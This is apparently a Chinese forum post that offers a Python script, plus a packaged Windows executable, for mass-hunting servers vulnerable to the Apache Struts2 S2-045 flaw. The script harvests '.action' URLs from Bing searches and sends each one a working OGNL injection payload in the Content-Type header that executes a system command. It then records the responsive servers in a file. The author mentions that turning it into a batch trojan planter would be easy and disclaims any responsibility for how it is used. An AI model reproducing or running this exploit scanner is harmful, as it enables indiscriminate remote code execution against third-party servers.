今天晚上看老铁们在群里就这个st2-045漏洞讨论得火热,个人不太喜欢日站,本来想直接写个批量挂马的东西,但是想想还是算了,如果你有兴趣,改改也很容易,反正不关我的事
测试图

依赖包的安装 pip install requests pip install beautifulsoup
对于此脚本所放置文件夹下必须有keyword.txt用来存放一行行的关键词
最开始是打算直接全部读取然后一个一个跑,不过感觉时间太漫长,测试时间太久
后来改成关键词就是自己输入,但是又感觉太麻烦
然后就变成了现在的读取关键词然后标号直接输入序号就可以
途中遇到了有的网址直接拒绝访问导致报错,还有的超时一直不返回报文,这些都解决了,个人测试的结果还可以,结果保存在一个txt下,至于你想再干些什么,不关我的事情了
说明
例子:
python s2-045.py 9 10第一个参数是你的文件名,第二个是关键词所对应的序号,第三个是你需要爬行的页数
序号与关键词的对应,可以直接运行 python s2-045.py 就可以产看帮助
脚本采用的bing搜索引擎, 文件我会打包在下面
上代码,python2和3通用 # encoding:utf-8 import sys,requests from bs4 import BeautifulSoup keyword = {} with open("keyword.txt") as f: i = 0 for keywordLine in f: keyword[str(i)] = keywordLine i += 1 usage = ''' usage : python s2-045.py 0 10 first parameter is your filename second parameter is your keyword's number which will be used by Bing Third parameter is the page number you want to crawl\n''' defpoc(actionURL): data = '--447635f88b584ab6b8d9c17d04d79918\ Content-Disposition: form-data; name="image1"\ Content-Type: text/plain; charset=utf-8\ \ x\ --447635f88b584ab6b8d9c17d04d79918--' header = { "Content-Length" : "155", "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36", "Content-Type" : "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", } try: request = requests.post(actionURL, data=data, headers=header, timeout = 10) except: return "Refused" return request.status_code defreturnURLList(): keywordsBaseURL = 'http://cn.bing.com/search?q=' +keyword[sys.argv[1]]+ '&first=' n =0 i = 1 while n < int(sys.argv[2]): baseURL = keywordsBaseURL + str(i) try: req = requests.get(baseURL) soup = BeautifulSoup(req.text, "html.parser") text = soup.select('li.b_algo > h2 > a') standardURL = [url['href'][:url['href'].index('action')]+'action' for url in text if 'action' in url['href']] except: print("HTTPERROR") continue i += 10 n += 1 yield standardURL defmain(): if len(sys.argv) != 3: print(usage) for k,v in keyword.items(): print("%s is %s"%(k, v)) sys.exit() for urlList in returnURLList(): for actionURL in urlList: code = poc(actionURL) print(str(code)+'----'+actionURL+'\n') if code == 200: with open("AvailableURL.txt","a") as f: f.write(actionURL+'\n') if __name__ == '__main__': main()下载地址
打包了win版,大家可以直接使用,例如在该exe目录下执行s2-045.exe 9 10 其他用法参照上面